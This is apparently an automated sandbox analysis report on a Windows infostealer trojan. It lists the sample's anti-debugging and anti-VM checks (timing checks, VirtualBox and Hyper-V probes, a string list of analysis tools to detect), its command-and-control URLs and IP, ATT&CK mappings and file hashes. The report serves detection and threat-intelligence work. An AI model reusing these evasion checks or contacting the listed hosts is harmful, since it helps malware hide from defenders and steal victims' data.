Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F06AA second address: 72F06AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F06AF second address: 72F071F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC728ECBE19h 0x00000009 xor eax, 07476546h 0x0000000f jmp 00007FC728ECBE11h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FC728ECBE10h 0x0000001b adc eax, 499A11E8h 0x00000021 jmp 00007FC728ECBE0Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a pop esi 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FC728ECBE10h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F071F second address: 72F0723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0723 second address: 72F0729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0729 second address: 72F072F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F072F second address: 72F0733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0733 second address: 72F0749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC7292A9B0Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0749 second address: 72F074F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSpecial instruction interceptor: First address: F819DD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSpecial instruction interceptor: First address: F81AC8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSpecial instruction interceptor: First address: 112B711 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSpecial instruction interceptor: First address: F7F606 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSpecial instruction interceptor: First address: 11BD5C0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008A255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_008A255D
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008A29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_008A29FF
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008A255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_008A255D
Source: qZA8AyGxiA.exe, qZA8AyGxiA.exe, 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: qZA8AyGxiA.exe, 00000000.00000003.2275525344.00000000019D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: qZA8AyGxiA.exe, 00000000.00000003.2384457844.0000000001A46000.00000004.00000020.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000003.2383814579.0000000001A46000.00000004.00000020.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2406532022.0000000001A46000.00000004.00000020.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000003.2383592032.0000000001A46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&}[P
Source: qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: qZA8AyGxiA.exeBinary or memory string: Hyper-V RAW
Source: qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: qZA8AyGxiA.exe, 00000000.00000003.2277579275.0000000006B31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=
Source: qZA8AyGxiA.exe, 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeFile opened: NTICE
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeFile opened: SICE
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008A1160 SetUnhandledExceptionFilter,0_2_008A1160
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008A11A3 SetUnhandledExceptionFilter,0_2_008A11A3
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008A13C9 SetUnhandledExceptionFilter,0_2_008A13C9
Source: qZA8AyGxiA.exe, qZA8AyGxiA.exe, 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: oBProgram Manager
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.6:49736 -> 5.101.3.217:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping741
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
qZA8AyGxiA.exe53%ReversingLabsWin32.Trojan.Generic
qZA8AyGxiA.exe53%VirustotalBrowse
qZA8AyGxiA.exe100%AviraTR/Crypt.TPM.Gen
qZA8AyGxiA.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd40%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF170%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862fff::30%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=00%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868620%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0035.t-0009.t-msedge.net
13.107.246.63
truefalse
    		high
    home.fiveth5ht.top
    		5.101.3.217
    		truefalse
      		high
      httpbin.org
      		3.218.7.103
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0true
        • Avira URL Cloud: safe
        		unknown
        http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862true
        • Avira URL Cloud: safe
        		unknown
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlqZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://html4/loose.dtdqZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              https://httpbin.org/ipbeforeqZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                https://curl.se/docs/http-cookies.htmlqZA8AyGxiA.exe, qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpfalse
                  		high
                  https://curl.se/docs/hsts.html#qZA8AyGxiA.exefalse
                    		high
                    http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862fff::3qZA8AyGxiA.exe, 00000000.00000002.2405629426.00000000019CA000.00000004.00000020.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000003.2384933418.00000000019C8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSqZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd4qZA8AyGxiA.exe, 00000000.00000002.2405629426.00000000019CA000.00000004.00000020.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000003.2384933418.00000000019C8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://curl.se/docs/alt-svc.htmlqZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpfalse
                      		high
                      http://.cssqZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpfalse
                        		high
                        http://.jpgqZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          5.101.3.217
                          		home.fiveth5ht.topRussian Federation
                          		34665PINDC-ASRUfalse
                          3.218.7.103
                          		httpbin.orgUnited States
                          		14618AMAZON-AESUSfalse

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1581233
                          Start date and time:2024-12-27 08:54:29 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 13s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:4
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:qZA8AyGxiA.exe
                          renamed because original name is a hash value
                          Original Sample Name:75f83958dc211ddd4dfed631aed3aafa.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          5.101.3.2174o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                          • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                          xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                          • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                          lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                          • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                          w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                          • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                          mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                          • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                          HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                          • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                          3.218.7.103Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                            DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                              xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                  w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                    E6rBvcWFWu.exeGet hashmaliciousUnknownBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      httpbin.orgCph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                      • 3.218.7.103
                                      3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                      • 34.226.108.155
                                      4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                      • 34.226.108.155
                                      xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                      • 3.218.7.103
                                      lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                      • 3.218.7.103
                                      8wiUGtm9UM.exeGet hashmaliciousLummaCBrowse
                                      • 34.226.108.155
                                      w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                      • 3.218.7.103
                                      mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                      • 34.226.108.155
                                      HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                                      • 34.226.108.155
                                      vJPhYDClT5.exeGet hashmaliciousUnknownBrowse
                                      • 34.226.108.155
                                      home.fiveth5ht.top4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                      • 5.101.3.217
                                      xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                      • 5.101.3.217
                                      lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                      • 5.101.3.217
                                      w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                      • 5.101.3.217
                                      mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                      • 5.101.3.217
                                      HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                                      • 5.101.3.217
                                      s-part-0035.t-0009.t-msedge.net60Zxcx88Uv.exeGet hashmaliciousUnknownBrowse
                                      • 13.107.246.63
                                      7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                      • 13.107.246.63
                                      1fi2LiofgW.exeGet hashmaliciousUnknownBrowse
                                      • 13.107.246.63
                                      zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                      • 13.107.246.63
                                      54861 Proforma Invoice AMC2273745.xlam.xlsxGet hashmaliciousUnknownBrowse
                                      • 13.107.246.63
                                      TAX INVOICE - NBO2506000632.xlam.xlsxGet hashmaliciousUnknownBrowse
                                      • 13.107.246.63
                                      installer.batGet hashmaliciousVidarBrowse
                                      • 13.107.246.63
                                      din.exeGet hashmaliciousVidarBrowse
                                      • 13.107.246.63
                                      lem.exeGet hashmaliciousVidarBrowse
                                      • 13.107.246.63
                                      atw3.dllGet hashmaliciousGozi, UrsnifBrowse
                                      • 13.107.246.63

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      PINDC-ASRU4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                      • 5.101.3.217
                                      xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                      • 5.101.3.217
                                      lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                      • 5.101.3.217
                                      w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                      • 5.101.3.217
                                      mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                      • 5.101.3.217
                                      HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                                      • 5.101.3.217
                                      6ufJvua5w2.exeGet hashmaliciousCryptOne, Stealc, VidarBrowse
                                      • 91.215.85.11
                                      Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                      • 91.215.85.142
                                      3cb770h94r.elfGet hashmaliciousOkiruBrowse
                                      • 45.145.172.130
                                      na.elfGet hashmaliciousMiraiBrowse
                                      • 5.188.210.194
                                      AMAZON-AESUSCph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                      • 3.218.7.103
                                      3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                      • 34.226.108.155
                                      DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                      • 3.218.7.103
                                      4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                      • 34.226.108.155
                                      xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                      • 3.218.7.103
                                      lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                      • 3.218.7.103
                                      8wiUGtm9UM.exeGet hashmaliciousLummaCBrowse
                                      • 34.226.108.155
                                      w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                      • 3.218.7.103
                                      db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                      • 50.17.226.153
                                      mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                      • 34.226.108.155

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      No created / dropped files found

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                      Entropy (8bit):7.984453851604812
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • VXD Driver (31/22) 0.00%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:qZA8AyGxiA.exe
                                      File size:4'508'672 bytes
                                      MD5:75f83958dc211ddd4dfed631aed3aafa
                                      SHA1:b47b4351e5be4bc3830ca73454ee8be8f4f32beb
                                      SHA256:85b5d57cad412bcc5921e20d965120f850769b547fc9e63c2a0f1a18f12f7867
                                      SHA512:ee8f783396c0419f6af4f3148ae91c994c084998ad499ace665c40053661cdb7b0d3f5d7c5d04ee18c4e84889b2944ae1dfc637a9d19f4271634a02c18b4b084
                                      SSDEEP:49152:F3IsqIWhmytT6yGQJLB3p85cVUaRp2HeauaziONsTybSgbBRV/uiGisa0ZZM48YS:Ffqb9eyJlr7V/qXiTyW04zAvyWJV0Z
                                      TLSH:0C2633D78D779245CF9C8F3A11224F03A96409F3DB7B08202A4EF70ECD25BE518966E9
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@.................................<9E...@... ............................

                                      File Icon

                                      Icon Hash:00928e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0x103d000
                                      Entrypoint Section:.taggant
                                      Digitally signed:true
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                      DLL Characteristics:DYNAMIC_BASE
                                      Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                      Authenticode Signature

                                      Signature Valid:
                                      Signature Issuer:
                                      Signature Validation Error:
                                      Error Number:
                                      Not Before, Not After
                                        Subject Chain
                                          Version:
                                          Thumbprint MD5:
                                          Thumbprint SHA-1:
                                          Thumbprint SHA-256:
                                          Serial:

                                          Entrypoint Preview

                                          Instruction
                                          jmp 00007FC72884F79Ah
                                          rsm
                                          inc esp
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add cl, ch
                                          add byte ptr [eax], ah
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
